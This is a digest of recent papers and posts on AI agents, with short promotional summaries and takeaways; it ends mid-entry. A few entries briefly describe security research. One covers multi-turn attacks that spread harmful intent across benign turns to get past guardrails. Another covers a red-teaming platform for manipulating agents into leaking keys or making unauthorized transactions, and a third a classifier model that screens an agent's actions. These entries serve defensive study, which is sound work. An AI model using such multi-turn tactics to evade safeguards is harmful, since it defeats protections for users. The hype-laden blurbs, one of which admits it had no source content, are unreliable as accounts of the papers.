Tag: agents

Intermediate

HAGE: Harnessing Agentic Memory via RL-Driven Weighted Graph Evolution

Dongming Jiang, Yi Li, Guanpeng Li, Qiannan Li, Bingzhe Li

Finally, a serious approach to agent memory that goes beyond naive vector search. HAGE reconceptualizes memory retrieval as query-conditioned graph traversal, where relationships have varying strength and confidence. This matters because most production agent systems still rely on flat retrieval that ignores the complex, context-dependent nature of how information should be connected and weighted. If you're building stateful agents, this provides a blueprint for sophisticated memory architectures.

Takeaways

Agent memory should be organized as weighted multi-relational graphs rather than flat vector stores.
Query-conditioned traversal enables more sophisticated retrieval than static similarity search.
Trainable relation features allow memory systems to adapt to different types of queries and contexts.

from May 18, 2026 · 0 citations · via api-hf · arXiv:2605.09942

Intermediate

WildClawBench: A Benchmark for Real-World, Long-Horizon Agent Evaluation

Shuangrui Ding, Xuanlang Dai, Long Xing, Shengyuan Ding, Ziyu Liu, Yang JingYi, Penghui Yang, Zhixiong Zhang, Xilin Wei, Xinyu Fang, Yubo Ma, Haodong Duan, Jing Shao, Jiaqi Wang, Dahua Lin, Kai Chen, Yuhang Zang

agents evaluations how-we-work

This benchmark exposes the embarrassing gap between synthetic agent evaluations and real-world performance. While most benchmarks use mock APIs and toy tasks, WildClawBench runs agents in actual CLI environments with real tools for 8+ minute tasks. The results are sobering—even frontier models like Claude Opus achieve only 35% success rates. If you're building production agents, this benchmark reveals what you're actually up against.

Takeaways

Synthetic benchmarks dramatically overestimate real-world agent performance in production environments.
Long-horizon tasks in native runtimes reveal fundamental limitations even in frontier models.
Production agent deployment requires significantly different evaluation criteria than academic benchmarks suggest.

from May 18, 2026 · via api-hf · arXiv:2605.10912

Intermediate

One Turn Too Late: Response-Aware Defense Against Hidden Malicious Intent in Multi-Turn Dialogue

Xinjie Shen, Rongzhe Wei, Peizhi Niu, Haoyu Wang, Ruihan Wu, Eli Chien, Bo Li, Pin-Yu Chen, Pan Li

security agents evaluations

Hidden malicious intent across multiple dialogue turns represents a sophisticated attack vector that current guardrails miss. This research provides both detection methods and the Multi-Turn Intent Dataset for training systems to identify when seemingly innocent conversations accumulate into harmful instructions. Critical for anyone deploying conversational AI systems that need to detect distributed attacks rather than just obvious single-turn violations.

Takeaways

Multi-turn attacks can bypass safety measures by distributing malicious intent across seemingly benign interactions.
Turn-level intervention requires precise detection of harm-enabling closure points without premature refusal.
Production conversational systems need specialized guardrails for accumulated harmful intent detection.

from May 18, 2026 · via api-hf · arXiv:2605.05630

Intermediate

Harness engineering: leveraging Codex in an agent-first world

agents software-engineering how-we-work

Essential reading for anyone building agent-first development workflows. Lopopolo shares practical insights from Codex implementation that challenge conventional wisdom about how AI should integrate into software engineering processes. This isn't another theoretical piece—it's a practitioner's guide to harnessing AI agents in real development environments where traditional tooling falls short.

Takeaways

Agent-first workflows require fundamentally different architectural thinking than traditional AI-assisted development.
Codex integration succeeds when it becomes the primary interface rather than a secondary tool.
Production agent systems need careful harness engineering to bridge the gap between AI capabilities and developer workflows.

from May 18, 2026 · via manual

Accessible

SWE-WebDevBench: Evaluating Coding Agent Application Platforms as Virtual Software Agencies

Siddhant Saxena, Nilesh Trivedi, Vinayaka Jyothi

software-engineering evaluations agents how-we-work

The first comprehensive evaluation framework for AI coding platforms that treats them as virtual software agencies rather than just code generators. The 68-metric evaluation across product management, engineering, and operations reveals four critical shortcomings in current platforms: specification bottlenecks, architectural blind spots, iteration fragility, and business readiness gaps—essential insights for anyone building or evaluating AI development tools.

Takeaways

AI coding platforms need evaluation beyond code quality to include product management and operations capabilities.
Current platforms struggle with specification understanding, architectural decisions, and iterative development.
Business readiness requires capabilities spanning multiple roles, not just engineering output.

from May 11, 2026 · via api-hf · arXiv:2605.04637

Intermediate

Agentic AI Systems Should Be Designed as Marginal Token Allocators

Siqi Zhu

agents opinion foundational how-we-work

Essential reading if you're building agentic systems—this paper reframes agent design through economic principles, showing how routing, planning, serving, and training decisions all solve the same optimization problem: marginal benefit equals marginal cost plus latency plus risk. Instead of thinking about agents as text generators, this framework treats them as token allocation economies, explaining why locally optimal decisions often lead to globally suboptimal performance.

Takeaways

All agent system layers (routing, planning, serving, training) solve the same economic optimization problem.
Local token minimization often leads to global misallocation of computational resources.
Agent performance should be evaluated through marginal token allocation efficiency rather than just accuracy metrics.

from May 11, 2026 · via api-hf · arXiv:2605.01214

Accessible

DecodingTrust-Agent Platform (DTap): A Controllable and Interactive Red-Teaming Platform for AI Agents

Zhaorun Chen, Xun Liu, Haibo Tong, Chengquan Guo, Yuzhou Nie, Jiawei Zhang, Mintong Kang, Chejian Xu, Qichang Liu, Xiaogeng Liu, Tianneng Shi, Chaowei Xiao, Sanmi Koyejo, Percy Liang, Wenbo Guo, Dawn Song, Bo Li

agents security evaluations

The first comprehensive red-teaming platform specifically designed for AI agents, addressing the critical security gap as agents move from demos to production. With agents increasingly handling sensitive operations like API calls, data management, and financial transactions, DTap provides 14 real-world domains and 50+ simulation environments to systematically test how adversaries can manipulate agents into harmful actions—essential infrastructure for anyone deploying agents in production.

Takeaways

Agent security testing requires specialized tools beyond traditional LLM red-teaming approaches.
Real-world agent vulnerabilities span API key leakage, data deletion, and unauthorized transactions.
Comprehensive security evaluation needs controllable, reproducible environments across multiple domains.

from May 11, 2026 · via api-hf · arXiv:2605.04808

Intermediate

AgentEscapeBench: Evaluating Out-of-Domain Tool-Grounded Reasoning in LLM Agents

Zhengkang Guo

agents evaluations

This benchmark directly tackles the hardest problem in agent development: maintaining reasoning quality when tools have complex dependencies and long-range interactions. The escape-room design forces agents to track hidden state, propagate intermediate results, and handle novel workflows—exactly the scenarios where production agents fail most spectacularly, with performance dropping from 90% to 60% as dependency depth increases.

Takeaways

Agent performance degrades sharply as tool dependency chains become more complex.
Current agents struggle with maintaining state across long sequences of tool interactions.
Real-world agent reliability requires testing beyond simple, isolated tool-use scenarios.

from May 11, 2026 · via api-arxiv · arXiv:2605.07926

Intermediate

Tool Calling is Linearly Readable and Steerable in Language Models

Zekun Wu

llms agents foundational

Breakthrough research showing that tool selection in LLMs is mechanistically interpretable and controllable—you can literally steer which tool gets chosen by manipulating internal activations with 77-100% accuracy. More importantly for production systems, the confidence gap between top tools predicts failure rates, with small gaps producing 14-21x more errors, giving you a way to catch tool-calling mistakes before they execute.

Takeaways

Tool selection decisions are linearly readable in model activations and can be steered with high accuracy.
The confidence gap between top tool choices reliably predicts failure rates.
Tool-calling errors can be detected before execution by monitoring internal activation patterns.

from May 11, 2026 · via api-arxiv · arXiv:2605.07990

Accessible

Operating-Layer Controls for Onchain Language-Model Agents Under Real Capital

T. J. Barton, Chris Constantakis, Patti Hauseman, Annie Mous, Alaska Hoffman, Brian Bergeron, Hunter Goodreau

agents software-engineering evaluations how-we-work

A remarkable real-world case study of autonomous LLM agents managing actual financial capital over 21 days, generating 7.5M invocations and $20M in trading volume with 99.9% settlement success. This paper provides invaluable insights into building reliable production agent systems, showing that reliability emerges from the operating layer architecture rather than the base model alone.

Takeaways

Reliability in production AI agents comes from systematic operating layer controls, not just model capabilities.
Real capital deployment reveals failure modes and reliability patterns invisible in simulation environments.
Large-scale agent deployments require careful attention to validation, state management, and settlement infrastructure.

from May 4, 2026 · via api-hf · arXiv:2604.26091

Intermediate

ClawMark: A Living-World Benchmark for Multi-Turn, Multi-Day, Multimodal Coworker Agents

Fanqing Meng, Lingxiao Du, Zijian Wu, Guanzheng Chen, Xiangyan Liu, Jiaqi Liao, Chonghe Jiang, Zhenglin Wan, Jiawei Gu, Pengfei Zhou, Rui Huang, Ziqi Zhao, Shengyuan Ding, Ailing Yu, Bo Peng, Bowei Xia, Hao Sun, Haotian Liang, Ji Xie, Jiajun Chen, Jiajun Song, Liu Yang, Ming Xu, Qionglin Qiu, Runhao Fu, Shengfang Zhai, Shijian Wang, Tengfei Ma, Tianyi Wu, Weiyang Jin, Yan Wang, Yang Dai, Yao Lai, Youwei Shu, Yue Liu, Yunzhuo Hao, Yuwei Niu, Jinkai Huang, Jiayuan Zhuo, Zhennan Shen, Linyu Wu, Cihang Xie, Yuyin Zhou, Jiaheng Zhang, Zeyu Zheng, Mengkang Hu, Michael Qizhe Shieh

agents evaluations

Addresses a critical gap in agent evaluation by introducing benchmarks for persistent, multi-day coworker agents that operate in evolving environments with emails, calendars, and documents. This benchmark is essential for teams building production agent systems that need to maintain context and effectiveness across extended time periods rather than single-session interactions.

Takeaways

Multi-day, stateful agent evaluation requires fundamentally different benchmarks than single-episode tasks.
Production coworker agents must handle independently evolving environments with multimodal information sources.
Deterministic verification methods can replace LLM-as-judge approaches for more reliable agent assessment.

from May 4, 2026 · via api-hf · arXiv:2604.23781

Intermediate

The Last Harness You'll Ever Build

Haebin Seong, Li Yin, Haoran Zhang

agents software-engineering how-we-work

Presents an evolutionary framework that automates the painful process of building agent harnesses for new domains, using adversarial evaluation and iterative refinement to optimize prompts, tools, and orchestration logic. This directly tackles one of the biggest bottlenecks in production AI systems—the manual engineering required to make foundation models effective for specific enterprise workflows.

Takeaways

Agent harness engineering can be automated through evolutionary optimization with adversarial evaluation feedback.
The meta-evolution loop concept enables systems to improve their own optimization processes over time.
Automated harness creation could dramatically reduce the engineering overhead of deploying agents in new domains.

from May 4, 2026 · via api-hf · arXiv:2604.21003

Intermediate

The Last Human-Written Paper: Agent-Native Research Artifacts

Jiachen Liu, Jiaxin Pei, Jintao Huang, Chenglei Si, Ao Qu, Xiangru Tang, Runyu Lu, Lichang Chen, Xiaoyan Bai, Haizhong Zheng, Carl Chen, Zhiyang Chen, Haojie Ye, Yujuan Fu, Zexue He, Zijian Jin, Zhenyu Zhang, Shangquan Sun, Maestro Harmon, John Dianzhuo Wang, Jianqiao Zeng, Jiachen Sun, Mingyuan Wu, Baoyu Zhou, Chenyu You, Shijian Lu, Yiming Qiu, Fan Lai, Yuan Yuan, Yao Li, Junyuan Hong, Ruihao Zhu, Beidi Chen, Alex Pentland, Ang Chen, Mosharaf Chowdhury, Zechen Zhang

foundational agents software-engineering opinion

Proposes a radical reimagining of research artifacts as machine-executable packages that preserve the full exploration process, including failures and implementation details that traditional papers discard. For teams building AI agents that need to understand and extend existing work, this framework offers a path toward truly reproducible and agent-consumable research.

Takeaways

Traditional research papers impose storytelling and engineering taxes that make them unsuitable for AI agents to consume and extend.
Agent-native artifacts should preserve the full exploration graph including failed experiments and rejected hypotheses.
Machine-executable research packages can bridge the gap between human-readable findings and agent-actionable specifications.

from May 4, 2026 · via api-hf · arXiv:2604.24658

Intermediate

Vision-Language-Action Safety: Threats, Challenges, Evaluations, and Mechanisms

Qi Li, Bo Yin, Weiqi Huang, Ruhao Liu, Bojun Zou, Runpeng Yu, Jingwen Ye, Weihao Yu, Xinchao Wang

security agents

Provides a comprehensive framework for understanding safety challenges in Vision-Language-Action models, organizing threats and defenses across training and inference time dimensions. Critical reading for teams building embodied AI systems, as it unifies fragmented safety research and highlights unique risks like irreversible physical consequences and multimodal attack surfaces.

Takeaways

VLA systems face unique safety challenges including irreversible physical consequences and multimodal attack vectors.
Attack and defense timing frameworks help organize mitigation strategies across the development lifecycle.
Embodied AI safety requires different approaches than text-only LLM safety due to real-world interaction constraints.

from May 4, 2026 · via api-hf · arXiv:2604.23775

Accessible

The Continuity Layer: Why Intelligence Needs an Architecture for What It Carries Forward

Samuel Sameer Tanguturi

opinion foundational agents how-we-work

This position paper argues that the most critical missing piece in AI architecture is a 'continuity layer' that preserves what models learn across sessions, addressing the fundamental amnesia problem where powerful per-session intelligence is lost when contexts reset. The paper challenges the field's focus on model size over persistent understanding and outlines specific engineering requirements for systems that truly accumulate knowledge over time.

Takeaways

The absence of persistent memory across sessions is a more critical architectural problem than model size in current AI systems.
Current memory APIs return flat facts that models must reinterpret from scratch, creating powerful but amnesiac intelligence.
A continuity layer requires seven specific characteristics including persistent state, selective retention, and coherent knowledge integration.

from Apr 27, 2026 · via api-hf · arXiv:2604.17273

Intermediate

AgentSPEX: An Agent SPecification and EXecution Language

Pengcheng Wang, Jerry Huang, Jiarui Yao, Rui Pan, Peizhi Niu, Yaowenqi Liu, Ruida Wang, Renhao Lu, Yuwei Guo, Tong Zhang

agents software-engineering

AgentSPEX introduces a declarative language for specifying LLM agent workflows with explicit control flow, addressing the maintainability nightmare of workflow logic tightly coupled to Python code in current frameworks like LangGraph and CrewAI. This matters because reactive prompting makes agent behavior unpredictable, while existing orchestration frameworks create maintenance headaches as workflows grow complex.

Takeaways

Current agent frameworks tightly couple workflow logic with Python code, making agents difficult to maintain as they grow complex.
Explicit control flow with typed steps, branching, and state management provides better structure than reactive prompting approaches.
Separating workflow specification from execution environment enables better tooling, verification, and collaborative development of agent systems.

from Apr 27, 2026 · via api-hf · arXiv:2604.13346

Accessible

SWE-chat: Coding Agent Interactions From Real Users in the Wild

Joachim Baumann, Vishakh Padmakumar, Xiang Li, John Yang, Diyi Yang, Sanmi Koyejo

agents software-engineering how-we-work evaluations

SWE-chat provides the first large-scale empirical evidence of how developers actually use AI coding agents in the wild, revealing that usage patterns are bimodal and agents are surprisingly inefficient. The dataset shows that only 44% of agent-produced code makes it into user commits, challenging the narrative of coding agent effectiveness and providing crucial insights for anyone building or deploying these tools in production.

Takeaways

Real-world coding patterns are bimodal: 41% of sessions involve agents writing virtually all code, while 23% have humans writing everything themselves.
Despite improving capabilities, only 44% of agent-produced code survives into user commits, revealing significant inefficiency in natural settings.
The first large-scale dataset of real coding agent usage provides empirical evidence that challenges assumptions about agent effectiveness in production.

from Apr 27, 2026 · via api-hf · arXiv:2604.20779

Intermediate

Symbolic Guardrails for Domain-Specific Agents: Stronger Safety and Security Guarantees Without Sacrificing Utility

Yining Hong, Yining She, Eunsuk Kang, Christopher S. Timperley, Christian Kästner

agents security evaluations

This research addresses a critical gap in AI agent security by introducing symbolic guardrails that provide formal guarantees against harmful actions, unlike neural approaches that only improve reliability. The paper reveals that 85% of agent safety benchmarks lack concrete policies, making this framework essential for anyone deploying agents in high-stakes business environments where privacy breaches or financial losses are unacceptable.

Takeaways

Symbolic guardrails can provide formal safety guarantees for AI agents, unlike training-based methods that only improve reliability.
85% of current agent safety benchmarks lack concrete policies, relying instead on vague high-level goals or common sense.
74% of well-specified policy requirements can be guaranteed through symbolic guardrails without sacrificing agent utility.

from Apr 27, 2026 · via api-hf · arXiv:2604.15579

Intermediate

TREX: Automating LLM Fine-tuning via Agent-Driven Tree-based Exploration

Zerun Ma, Guoqiang Wang, Xinchen Xie, Yicheng Chen, He Du, Bowen Li, Yanan Sun, Wenran Liu, Kai Chen, Yining Li

agents software-engineering how-we-work

TREX automates the entire LLM fine-tuning pipeline through multi-agent collaboration, from literature research to data preparation to model evaluation. This challenges the current reality where fine-tuning requires extensive manual orchestration by ML engineers, offering a glimpse into fully automated ML workflows that could democratize model customization for domain-specific applications.

Takeaways

Multi-agent systems can automate complex ML workflows beyond individual tasks, handling entire fine-tuning lifecycles.
Modeling the experimental process as a search tree enables efficient exploration and reuse of historical training results.
Automated fine-tuning could significantly reduce the expertise barrier for domain-specific LLM customization.

from Apr 20, 2026 · via api-hf · arXiv:2604.14116

Intermediate

Don't Retrieve, Navigate: Distilling Enterprise Knowledge into Navigable Agent Skills for QA and RAG

Yiqun Sun, Pengfei Wei, Lawrence B. Hsieh

rag agents software-engineering

Corpus2Skill fundamentally reimagines RAG by giving AI agents a navigable map of your knowledge base instead of treating them as passive consumers of search results. Rather than hoping retrieval finds the right documents, agents can see the corpus structure, drill down through hierarchical summaries, and strategically combine evidence across different branches—solving the core limitation that RAG systems can't reason about what they haven't seen.

Takeaways

Traditional RAG limits AI agents to passive consumption of search results without visibility into corpus structure or unexplored areas.
Hierarchical skill directories enable agents to navigate knowledge strategically and combine evidence across different topic branches.
Offline corpus compilation into navigable structures provides better performance than runtime retrieval-only approaches.

from Apr 20, 2026 · via api-hf · arXiv:2604.14572

Accessible

Steve Yegge

how-we-work agents software-engineering opinion

Yegge's conversation reveals that even Google's engineering teams follow the same AI adoption pattern as traditional companies: 20% power users building with agents, 20% refusing AI tools entirely, and 60% stuck using basic chat interfaces like Cursor. This insight challenges assumptions about tech giants being ahead on internal AI adoption and suggests most organizations are at similar maturity levels regardless of their AI product offerings.

Takeaways

Google's internal AI adoption mirrors traditional companies despite their advanced AI research and products.
The industry-wide pattern shows 60% of engineers still using basic chat tools rather than advanced agentic workflows.
Having cutting-edge AI products doesn't necessarily translate to advanced internal adoption within engineering teams.

from Apr 20, 2026 · 0 citations · via rss-willison

Intermediate

When Using AI Leads to “Brain Fry”

agents how-we-work foundational

If your team is pushing engineers to maximize AI agent usage (measured by token consumption), this research reveals the hidden costs you're creating. Organizations incentivizing heavy AI tool oversight are inadvertently driving employees to a cognitive breaking point where mental fatigue leads to increased errors, poor decision-making, and higher turnover. Essential reading for engineering leaders designing AI-driven workflows who want to avoid burning out their teams.

Takeaways

Measuring and rewarding token consumption as a performance metric directly contributes to cognitive overload and employee burnout.
"AI brain fry" manifests as mental fog, slower decision-making, and headaches from excessive AI tool oversight beyond cognitive capacity.
AI workflows can be designed to reduce burnout through specific manager, team, and organizational practices that limit cognitive strain.

from Apr 20, 2026 · via manual

Accessible

Sema Code: Decoupling AI Coding Agents into Programmable, Embeddable Infrastructure

Huacan Wang, Jie Zhou, Ningyan Zhu, Shuo Zhang, Feiyu Chen, Jiarou Wu, Ge Chen, Chen Liu, Wangyi Chen, Xiaofeng Mou, Yi Xu

software-engineering agents how-we-work

Sema Code tackles the enterprise reality that every AI coding solution locks you into their specific interface, making it impossible to reuse AI capabilities across different development environments. Their embeddable architecture decouples the AI reasoning engine from delivery mechanisms, letting teams integrate the same AI coding capabilities into CLIs, IDEs, web apps, or custom toolchains without rebuilding from scratch.

Takeaways

Current AI coding solutions create vendor lock-in by coupling reasoning capabilities with specific delivery interfaces.
Decoupling the AI engine into a standalone library enables reuse across heterogeneous engineering environments.
The framework addresses enterprise needs like multi-tenancy, session management, and permission control that are missing from consumer AI coding tools.

from Apr 20, 2026 · via api-hf · arXiv:2604.11045

Intermediate

SkVM: Compiling Skills for Efficient Execution Everywhere

Le Chen, Erhu Feng, Yubin Xia, Haibo Chen

agents software-engineering foundational

SkVM addresses the critical problem that AI agent "skills" behave inconsistently across different platforms because they're treated as raw prompts rather than compiled code. By applying traditional compiler techniques to LLM skills—measuring model capabilities, performing capability-based compilation, and enabling runtime optimization—this system makes agent skills truly portable and efficient across different model-harness combinations.

Takeaways

Treating AI agent skills as compilable code rather than raw prompts enables consistent behavior across different platforms.
Capability profiling of model-harness pairs allows for targeted compilation and optimization of skill execution.
JIT compilation and adaptive recompilation techniques can significantly improve agent skill performance at runtime.

from Apr 20, 2026 · via api-hf · arXiv:2604.03088

Intermediate

Neural Computers

Mingchen Zhuge, Changsheng Zhao, Haozhe Liu, Zijian Zhou, Shuming Liu, Wenyi Wang, Ernie Chang, Gael Le Lan, Junjie Fei, Wenxuan Zhang, Yasheng Sun, Zhipeng Cai, Zechun Liu, Yunyang Xiong, Yining Yang, Yuandong Tian, Yangyang Shi, Vikas Chandra, Jürgen Schmidhuber

foundational agents software-engineering

This proposes a radical paradigm shift where models don't just generate code or control external systems—they become the execution environment itself, unifying computation, memory, and I/O in learned runtime state. Neural Computers learn to execute programs by watching I/O traces and can potentially be reprogrammed through natural language rather than traditional coding. While early-stage, this vision could fundamentally reshape how we build AI systems by eliminating the boundary between model and runtime environment.

Takeaways

Neural Computers eliminate the distinction between model and execution environment by making the model itself the running computer.
Early implementations can learn interface primitives and basic execution patterns from I/O traces alone.
This paradigm shift could enable natural language reprogramming of computational systems without traditional coding interfaces.

from Apr 13, 2026 · via api-hf · arXiv:2604.06425

Intermediate

Claw-Eval: Toward Trustworthy Evaluation of Autonomous Agents

Bowen Ye, Rang Li, Qibin Yang, Yuanxin Liu, Linli Yao, Hanglong Lv, Zhihui Xie, Chenxin An, Lei Li, Lingpeng Kong, Qi Liu, Zhifang Sui, Tong Yang

agents evaluations software-engineering

Current agent benchmarks are dangerously inadequate for production deployment because they only check final outputs without understanding how agents got there, and they barely evaluate safety or robustness. Claw-Eval fixes this with 300 real-world tasks that record every agent action through execution traces, audit logs, and environment snapshots, enabling fine-grained evaluation across completion, safety, and robustness dimensions. This comprehensive approach is essential for teams serious about deploying autonomous agents in high-stakes environments.

Takeaways

Current agent evaluation methods are inadequate for production use because they ignore the decision-making process and safety concerns.
Comprehensive evaluation requires tracking every agent action through multiple evidence channels, not just final outputs.
Real production deployment demands measuring completion, safety, and robustness across multiple trials with fine-grained rubrics.

from Apr 13, 2026 · via api-hf · arXiv:2604.06132

Accessible

ClawsBench: Evaluating Capability and Safety of LLM Productivity Agents in Simulated Workspaces

Xiangyi Li, Kyoung Whan Choe, Yimin Liu, Xiaokun Chen, Chujun Tao, Bingran You, Wenbo Chen, Zonglin Di, Jiankai Sun, Shenghan Zheng, Jiajun Bao, Yuanli Wang, Weixiang Yan, Yiyuan Li, Han-chung Lee

agents evaluations security how-we-work

Testing agents on live productivity services is too risky, but existing benchmarks don't capture the complexity of real workflows across Gmail, Slack, and Google services. ClawsBench solves this with high-fidelity mock services that maintain full state and support deterministic snapshot/restore, enabling safe evaluation of 44 structured tasks including dangerous scenarios. The research reveals that domain skills (API knowledge injection) and meta prompts (cross-service coordination) are independent levers that teams can optimize separately for better agent performance.

Takeaways

High-fidelity simulation environments with full state management enable safe evaluation of agents in realistic productivity scenarios.
Domain skills and meta prompts are independent architectural components that can be optimized separately for better agent performance.
Safety-critical scenarios must be explicitly tested since agents can cause irreversible damage in productivity environments.

from Apr 13, 2026 · via api-hf · arXiv:2604.05172

Intermediate

Type-Checked Compliance: Deterministic Guardrails for Agentic Financial Systems Using Lean 4 Theorem Proving

Devakh Rashie, Veda Rashi

security agents software-engineering

Financial services face an existential problem: probabilistic LLMs operating in domains requiring absolute compliance guarantees, and existing guardrails are fundamentally inadequate for complex regulatory constraints. This paper presents a breakthrough using Lean 4 theorem proving to treat every AI action as a mathematical conjecture—execution only proceeds if the system can formally prove regulatory compliance. While the approach targets financial services, the formal verification framework could revolutionize how we build deterministic guardrails for any high-stakes AI system.

Takeaways

Probabilistic guardrails are fundamentally inadequate for regulated industries that demand mathematical certainty of compliance.
Formal theorem proving can provide deterministic guarantees by treating every AI action as a provable mathematical conjecture.
Auto-formalizing policies into verifiable code bridges the gap between human regulations and machine-enforceable constraints.

from Apr 13, 2026 · 0 citations · via api-hf · arXiv:2604.01483

Intermediate

Components of A Coding Agent

agents software-engineering llms

Essential reading if you're architecting coding agents for production use. This breaks down the core components that make LLMs effective at code generation: sophisticated tool integration, persistent memory systems that maintain context across interactions, and repository-aware context management that helps models understand large codebases. The practical focus on how these pieces work together makes this invaluable for teams moving beyond simple code completion to full coding assistance.

Takeaways

Effective coding agents require sophisticated tool integration beyond simple code completion.
Memory systems that persist context across sessions are crucial for maintaining coherent development workflows.
Repository-aware context management enables agents to understand and work with large, complex codebases.

from Apr 13, 2026 · via manual

Advanced

Moonlake: Causal World Models should be Multimodal, Interactive, and Efficient — with Chris Manning and Fan-yun Sun

foundational agents reasoning

Stanford researchers discuss Moonlake, their approach to building causal world models that understand multimodal interactions and can efficiently reason about cause and effect in complex environments. This foundational research explores how AI systems can develop better understanding of how the world works, which is crucial for building more capable agents that can plan and reason about their actions.

Takeaways

Causal world models enable AI systems to understand cause-and-effect relationships rather than just correlations.
Multimodal approaches help models build more comprehensive understanding of how actions affect environments.
Efficient world models are essential for practical agent deployment in real-world scenarios.

from Apr 6, 2026 · via rss-latentspace

Intermediate

Vulnerability Research Is Cooked

security agents foundational opinion

Thomas Ptacek's analysis of how frontier models are fundamentally disrupting vulnerability research, arguing that AI agents will soon automate most exploit development work. He predicts this won't be gradual improvement but a sudden step-function change that transforms both the economics and practice of security research. Essential reading for understanding how AI is reshaping cybersecurity beyond just coding assistance.

Takeaways

Frontier AI models will automate vulnerability discovery by systematically analyzing codebases at scale.
The transformation will be sudden rather than gradual, fundamentally altering security research economics.
Most high-impact vulnerability research may soon require only pointing agents at source code rather than manual analysis.

from Apr 6, 2026 · via rss-willison

Intermediate

Show HN: Gemma Gem – AI model embedded in a browser – no API keys, no cloud

ikessler

agents llms software-engineering open-source

This Chrome extension demonstrates practical browser-based AI deployment by embedding Google's Gemma 4 model locally via WebGPU, complete with webpage interaction capabilities like clicking, typing, and JavaScript execution. It proves that sophisticated AI agents can run entirely client-side without API dependencies, opening new possibilities for privacy-preserving AI tools. The implementation shows how to build truly local AI agents with real-world utility.

Takeaways

WebGPU enables running 2B parameter models entirely in the browser without cloud dependencies.
Local AI agents can interact with web pages through tool calling while preserving user privacy.
Browser-based AI deployment eliminates API costs and latency while maintaining reasonable functionality.

from Apr 6, 2026 · 100 points on HN · via api-hn

Intermediate

The Design of AI Memory Systems

agents rag foundational

Unable to provide detailed description due to missing content, but AI memory systems design is crucial for building production agents and RAG applications that need to maintain context and learn from interactions.

from Apr 6, 2026 · 7 points on Lobsters · via api-lobsters

Intermediate

Eight years of wanting, three months of building with AI

agents software-engineering how-we-work foundational

A compelling case study of how AI agents transformed an eight-year software vision into reality in just three months, specifically building comprehensive SQLite development tools. The author provides detailed insights into agentic engineering workflows and how AI can tackle complex, long-deferred projects that seemed too daunting for traditional development approaches. This demonstrates the paradigm shift from AI as a coding assistant to AI as a capable engineering partner.

Takeaways

AI agents can make previously intractable personal projects suddenly feasible by handling complex implementation details.
Agentic engineering workflows enable rapid prototyping of sophisticated developer tools that would take months using traditional methods.
The key to successful AI-assisted development is clearly defining goals while letting agents handle implementation complexity.

from Apr 6, 2026 · via rss-willison

Intermediate

Introducing the OpenAI Safety Bug Bounty program

security agents prompt-engineering

OpenAI's new bug bounty program specifically targets AI safety issues including prompt injection, agentic vulnerabilities, and data exfiltration — signaling that these attack vectors are now mainstream security concerns. For production teams, this validates that AI-specific security testing should be part of standard security practices, not an afterthought.

Takeaways

AI-specific vulnerabilities like prompt injection and agentic exploits are now recognized as legitimate security concerns requiring dedicated testing.
Production AI systems need security models that account for both traditional software vulnerabilities and novel AI attack vectors.

from Mar 29, 2026 · via rss-openai

Intermediate

Thoughts on slowing the fuck down

agents software-engineering opinion how-we-work

The creator of Pi agent framework delivers a sharp critique of current AI-assisted development practices, arguing that the rush to generate code quickly is eroding engineering discipline and creating unsustainable technical debt. His core thesis: agent mistakes accumulate faster than human mistakes, making the 'move fast' approach particularly dangerous in AI-assisted development.

Takeaways

AI agents can generate technical debt faster than human developers, requiring new approaches to code quality control.
The velocity benefits of AI coding tools may come at the cost of long-term code maintainability and team understanding.
Engineering teams need intentional practices to maintain discipline when AI makes rapid development so tempting.

from Mar 29, 2026 · via rss-willison

Intermediate

Pi: The Minimal Agent Within OpenClaw

agents software-engineering how-we-work

Pi represents a minimalist approach to coding agents that focuses on doing fewer things extremely well rather than trying to be a general-purpose assistant. The author argues this constraint-driven design offers a glimpse into how production coding agents should be built — with clear boundaries and specific capabilities rather than attempting to solve every development task.

Takeaways

Minimalist agent design with clear constraints may be more effective than general-purpose coding assistants.
Focused agents that excel at specific tasks could be the future of AI-assisted development workflows.

from Mar 29, 2026 · via manual

Intermediate

Auto mode for Claude Code

agents security llms software-engineering

Anthropic introduces 'auto mode' for Claude Code that lets the AI make permission decisions autonomously, with a separate Claude model acting as a safety classifier before each action executes. This represents a sophisticated approach to the fundamental challenge of autonomous agents — how to give them freedom to act while maintaining safety guardrails through multi-model oversight.

Takeaways

Multi-model safety architectures can enable more autonomous agent behavior by having one model review another's planned actions.
Permission management in AI agents is evolving from binary allow/deny to context-aware decision making with built-in safeguards.

from Mar 29, 2026 · via rss-willison

Accessible

Coding agents for data analysis

agents software-engineering how-we-work

Comprehensive workshop content demonstrating practical applications of coding agents for data analysis workflows. Covers real-world use cases like database querying, data exploration, and cleaning tasks using Claude Code and OpenAI Codex. Extremely valuable for engineers building data analysis pipelines with LLMs, providing concrete examples and methodologies rather than theoretical frameworks.

Takeaways

Coding agents excel at automating data analysis workflows including database querying, exploration, and cleaning tasks.
Claude Code and OpenAI Codex provide practical frameworks for building data analysis pipelines with concrete implementation examples.
Workshop-style learning with real use cases is more valuable than theoretical frameworks for implementing coding agents.

from Mar 23, 2026 · via rss-willison

Intermediate

An Agentic Multi-Agent Architecture for Cybersecurity Risk Management

Ravish Gupta

agents security how-we-work

Demonstrates a production-ready multi-agent architecture that cuts cybersecurity risk assessment costs from $15,000 to near-zero while maintaining 85% agreement with certified practitioners. The six-agent system uses persistent shared context to build comprehensive assessments in under 15 minutes. This is an excellent blueprint for building multi-agent systems that tackle expensive professional services.

Takeaways

A six-agent architecture reduced cybersecurity risk assessment costs from $15,000 to near-zero while maintaining 85% agreement with certified practitioners.
Multi-agent systems with persistent shared context can complete complex professional assessments in under 15 minutes.
This architecture provides a blueprint for replacing expensive professional services with coordinated AI agents.

from Mar 23, 2026 · via api-arxiv · arXiv:2603.20131

Intermediate

Agentic Harness for Real-World Compilers

Yingwei Zheng

llms agents software-engineering

Introduces the first specialized agentic framework for fixing compiler bugs, addressing the massive performance drop (60%) that frontier models experience when tackling compiler issues versus regular software bugs. The llvm-autofix system outperforms state-of-the-art by 22% and provides compiler-specific tools that general coding agents lack. Essential if you're building AI systems for low-level systems programming.

Takeaways

Frontier models experience a 60% performance drop on compiler bugs versus regular software bugs, requiring specialized tooling.
The llvm-autofix system outperforms general coding agents by 22% through compiler-specific tools and domain knowledge.
Building AI systems for specialized domains like systems programming requires domain-specific agentic frameworks.

from Mar 23, 2026 · 0 citations · via api-arxiv · arXiv:2603.20075

Accessible

Orchestrating Human-AI Software Delivery: A Retrospective Longitudinal Field Study of Three Software Modernization Programs

Maximiliano Armesto

software-engineering agents how-we-work

